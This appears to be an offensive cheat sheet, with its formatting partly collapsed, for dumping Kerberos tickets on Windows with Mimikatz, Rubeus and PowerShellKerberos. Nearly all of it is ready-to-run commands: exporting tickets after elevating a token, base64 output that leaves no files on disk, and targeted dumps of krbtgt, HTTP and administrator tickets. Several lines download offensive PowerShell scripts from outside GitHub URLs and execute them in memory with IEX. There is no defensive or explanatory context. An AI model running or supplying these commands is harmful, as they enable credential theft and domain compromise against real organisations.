# Export to file methods# Export tickets (Preferred Method (More Accurate))Mimikatz.exe"token::elevate""sekurlsa::tickets /export"# Alternative MethodMimikatz.exe"token::elevate""kerberos::list /export"
# Export to Base64 without touching diskMimikatz.exe"token::elevate""standard::base64 /out:true""sekurlsa::tickets /export"
# Load into memoryIEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BC-SECURITY/Empire/main/empire/test/data/module_source/credentials/Invoke-Mimikatz.ps1')
# Export to file methods# Export tickets (Preferred Method (More Accurate))Invoke-Mimikatz-Command '"token::elevate "sekurlsa::tickets /export"'# Alternative MethodInvoke-Mimikatz-Command '""token::elevate" "kerberos::list /export"'
# Export to Base64 without touching diskInvoke-Mimikatz-Command '"token::elevate" "standard::base64 /out:true" "sekurlsa::tickets /export"'
Rubeus
# Dump All.\Rubeus.exe dump /nowrap# Dump Specified tickets that match a service.\Rubeus.exe dump /service:krbtgt /nowrap.\Rubeus.exe dump /service:HTTP /nowrap# Dump tickets for specified users.\Rubeus.exe dump /user:administrator /nowrap# Both.\Rubeus.exe dump /service:krbtgt /user:administrator /nowrap
# Load into memoryIEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Rubeus.ps1')
# Dump AllInvoke-Rubeus-Command "dump /nowrap"# Dump Specified tickets that match a serviceInvoke-Rubeus-Command "dump /service:krbtgt /nowrap"Invoke-Rubeus-Command "dump /service:HTTP /nowrap"# Dump tickets for specified usersInvoke-Rubeus-Command "dump /user:administrator /nowrap"# BothInvoke-Rubeus-Command "dump /service:krbtgt /user:administrator /nowrap"
PowerShellKerberos
# Load into memory and dumpIEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/MzHmO/PowershellKerberos/main/dumper.ps1')
